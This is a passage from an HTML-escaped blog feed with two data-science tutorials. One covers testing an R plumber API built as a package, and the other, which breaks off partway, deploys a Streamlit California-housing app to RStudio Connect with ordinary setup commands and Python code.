&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[sharedSecret]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ └──/is_alive (GET)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This {cookieCutter} example is available to view at our &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-api-as-package-structure" rel="external"&gt;Github blog
repo&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="basic-testing"&gt;Basic testing&lt;/h2&gt;
&lt;p&gt;In my real project I refrained from having any actual function
definitions being made in &lt;code&gt;inst/&lt;/code&gt;. Instead each function that was part
of the exposed API was a proper exported function from my package
(additionally filenames for said functions followed a regular structure
too of &lt;code&gt;api_&amp;lt;topic&amp;gt;.R&lt;/code&gt;). This allows for leveraging &lt;code&gt;{testthat}&lt;/code&gt; against
the logic of each of the functions as well as using other tools like
&lt;code&gt;{lintr}&lt;/code&gt; and ensuring that dependencies, documentation etc are all
dealt with appropriately. Testing individual functions that will be
exposed as routes can be a little different to other R functions in that
the objects passed as arguments come from a request. As alluded to in
the introduction I will prepare another blog post detailing some
elements of testing for API as a package but a short snippet that I
found particularly helpful for testing that a running API is functioning
as I expect is included here.&lt;/p&gt;
&lt;p&gt;The following code could be used to set up (and subsequently tear down)
a running API that is expecting requests for a package &lt;code&gt;cookieCutter&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/setup.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## run before any tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# pick a random available port to serve your app locally&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httpuv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;randomPort&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start a background R process that launches an instance of the API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# serving on that random port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;running_api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; callr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;r_bg&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(port) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;(dir)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;(routes)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; port, host &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.0.0.0&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; port)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Small wait for the background process to ensure it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# starts properly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## run after all tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;withr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;defer&lt;/span&gt;(running_api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;kill&lt;/span&gt;(), testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;teardown_env&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A simple test to ensure that our is_alive endpoint works then might look
like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;is alive&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;GET&lt;/span&gt;(glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;http://0.0.0.0:{port}/test/is_alive&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(res&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;status_code, &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="logging"&gt;Logging&lt;/h2&gt;
&lt;p&gt;{shiny} has some useful packages for adding logging, in particular
{shinylogger} is very helpful at giving you plenty of logging for little
effort on my part as the user. As far as I could find nothing similar
exists for {plumber} so I set up a bunch of hooks, using the {logger}
package to write information to both file and terminal. Since that could
form it’s own blogpost I will save that discussion for the future.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-structure/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Python application deployment with RStudio Connect: Streamlit</title><link>https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/</link><pubDate>Thu, 08 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/streamlit.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the final part of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/" rel="external"&gt;Part 1: Python API deployment with RStudio Connect: Flask&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/" rel="external"&gt;Part 2: Python API deployment with RStudio Connect: FastAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Python API deployment with RStudio Connect: Streamlit (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/products/connect/" rel="external"&gt;RStudio Connect&lt;/a&gt; is a platform which is well known for providing the ability to deploy and share R applications such as &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny&lt;/a&gt; apps and &lt;a href="https://www.rplumber.io/" rel="external"&gt;Plumber&lt;/a&gt; APIs as well as plots, models and &lt;a href="https://rmarkdown.rstudio.com/" rel="external"&gt;R Markdown&lt;/a&gt; reports. However, despite the name, it is not just for R developers (hence their &lt;a href="https://www.rstudio.com/blog/rstudio-is-becoming-posit/" rel="external"&gt;recent announcement&lt;/a&gt;). RStudio Connect also supports a growing number of Python applications, API services including &lt;a href="https://flask.palletsprojects.com/en/2.1.x/" rel="external"&gt;Flask&lt;/a&gt; and &lt;a href="https://fastapi.tiangolo.com/" rel="external"&gt;FastAPI&lt;/a&gt; and interactive web based apps such as &lt;a href="http://docs.bokeh.org/en/latest/" rel="external"&gt;Bokeh&lt;/a&gt; and &lt;a href="https://streamlit.io/" rel="external"&gt;Streamlit&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In this post we will look at how to deploy a Streamlit application to RStudio Connect. Streamlit is a framework for creating interactive web apps for data visualisation in Python. It&amp;rsquo;s API makes it very easy and quick to display data and create interactive widgets from just a regular Python script.&lt;/p&gt;
&lt;h3 id="creating-a-streamlit-app"&gt;Creating a Streamlit app&lt;/h3&gt;
&lt;p&gt;First of all we need to create a project folder and install Streamlit in a virtual environment. The &lt;a href="https://docs.streamlit.io/library/get-started/installation" rel="external"&gt;Streamlit documentation&lt;/a&gt; recommends using the &lt;a href="https://pypi.org/project/pipenv/" rel="external"&gt;Pipenv&lt;/a&gt; environment manager for Linux/macOS.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir streamlit-deploy-demo &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cd streamlit-deploy-demo
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv shell
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv install streamlit
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# test your installation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;streamlit hello
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you are using Windows then see &lt;a href="https://docs.streamlit.io/library/get-started/installation" rel="external"&gt;here&lt;/a&gt; for how to install Streamlit with Anaconda.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-deploy-streamlit-rsconnect"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;For this demo there are a few other dependencies which we will need to install with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv install plotly scikit-learn &lt;span style="color:#79c0ff"&gt;pydeck&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;0.7.1
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you are getting started with Streamlit you might like to check out their &lt;a href="https://docs.streamlit.io/library/get-started/create-an-app" rel="external"&gt;tutorial&lt;/a&gt; for a more in depth guide on how to build an app. However, for the purposes of this blog post we give the code for an example app below. This loads &lt;a href="https://scikit-learn.org/stable/datasets/real_world.html#california-housing-dataset" rel="external"&gt;california housing dataset&lt;/a&gt; and displays some plots and maps of the data using &lt;a href="https://dash.plotly.com/" rel="external"&gt;Plotly&lt;/a&gt;, Streamlit and &lt;a href="https://deckgl.readthedocs.io/en/latest/" rel="external"&gt;Pydeck&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Create a file called &lt;code&gt;streamlit_housing.py&lt;/code&gt; with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch streamlit_housing.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and copy the code below into it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# streamlit_housing.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.datasets&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; fetch_california_housing
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;streamlit&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;st&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.express&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pydeck&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pdk&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Give our app a title&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;title(&lt;span style="color:#a5d6ff"&gt;&amp;#34;California House Prices&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load our data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@st.cache&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# cache the data so it isn&amp;#39;t reloaded every time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_data&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; housing &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; fetch_california_housing()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(housing&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;data, columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;housing&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;feature_names)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data[&lt;span style="color:#a5d6ff"&gt;&amp;#34;medprice&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; housing&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;target
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lowercase &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: str(x)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;lower()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rename(lowercase, axis&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;columns&amp;#34;&lt;/span&gt;, inplace&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data_load_state &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Loading data...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; load_data()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data_load_state&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Data loaded!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a tickbox to display the raw data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;checkbox(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Show raw data&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subheader(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Raw data&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;write(data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a plotly figure&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subheader(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Plot data with Plotly&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fig &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; px&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;scatter(data, x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;medinc&amp;#34;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;medprice&amp;#34;&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;averooms&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fig&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;update_layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; font_family&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Courier New&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxis_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;median income / $10000&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yaxis_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;median house price / $100000&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plotly_chart(fig)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a map of datapoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subheader(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Map data points with `st.map()`&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;filter_price &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;slider(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Maximum price / $100000&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5.0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5.0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# a slider widget to select price&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;filtered_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[data[&lt;span style="color:#a5d6ff"&gt;&amp;#34;medprice&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; filter_price]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;map(filtered_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a pydeck map&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subheader(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Map LA house prices with pydeck&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;pydeck_chart(
